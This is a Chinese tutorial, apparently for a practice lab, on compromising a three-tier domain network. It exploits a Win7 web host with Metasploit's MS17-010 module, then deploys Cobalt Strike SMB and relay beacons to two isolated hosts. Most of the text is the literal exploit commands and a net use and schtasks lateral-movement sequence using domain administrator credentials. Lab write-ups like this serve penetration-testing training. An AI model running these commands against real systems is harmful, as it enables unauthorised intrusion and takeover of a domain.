以前讲过用cs_smb_beacon上线不出网机器，但是真实的网络拓扑肯定不止这么一层的网络！

所以我就来搭建一个复杂一点的网络环境！！

当然了，这三台电脑之间都是不同的网段，（但是同属于一个域环境！！）

来看网络拓扑！！

1.先拿下web机器

这里拿下的方式有很多种，那么我就先讲最简单的一种，没错又是永恒之蓝，但是现实生活中肯定是不会将一台存在永恒之蓝的win7作为web机器的！！

kali：

msfconsole

search ms17-010

use 0

set rhost 192.168.43.131
exploit

成功拿下shell 

于是先上线到cs！！ 监听器，木马这些我就不多说原理了

 记得选上这个没有(stagless)的木马

然后上传，点击上线，可谓是一气呵成！！！    

这样，我们就上线了第一台web机器！！！

2.拿下二层不出网DC

这里我选择生成的监听器还是smb的beacon 

然后木马那里就要选择带有stageless的那个木马了，然后先上传到web机器！！！

然后就是我们熟悉的颁布计划任务了！！！

net use \192.168.2.129\ipc$  "hongrisec@2024" /user:god\administrator
shell net use 
shell copy beacon.exe \192.168.2.129\c$
shell schtasks /create /s 192.168.2.129 /tn beacon /sc onstart /tr c:\beacon.exe /ru system /f
shell schtasks /run /s 192.168.2.129 /i /tn "beacon"
link 192.168.2.129

这样就能上线了第二层不出网的域控！！！

3.上线第三层不出网Win10

这里的操作和前面的操作不一样，前面的连接都是用的正向连接，现在我们来玩一下反向连接

先在cs执行以下操作，选择转发上线！！！

然后你生成一个监听器就是记住你的端口别冲突了！！

然后就是生成以这个为监听器的木马，并且颁布计划任务了

net use \192.168.1.130\ipc$  "hongrisec@2024" /user:god\administrator
shell net use 
shell copy last.exe \192.168.1.130\c$
shell schtasks /create /s 192.168.1.130 /tn last /sc onstart /tr c:\last.exe /ru system /f
shell schtasks /run /s 192.168.1.130 /i /tn "last"
 
link 192.168.1.130

最后是能看见是能够以last.exe去上线这个木马的！！！ 

可以看见是能够执行命令的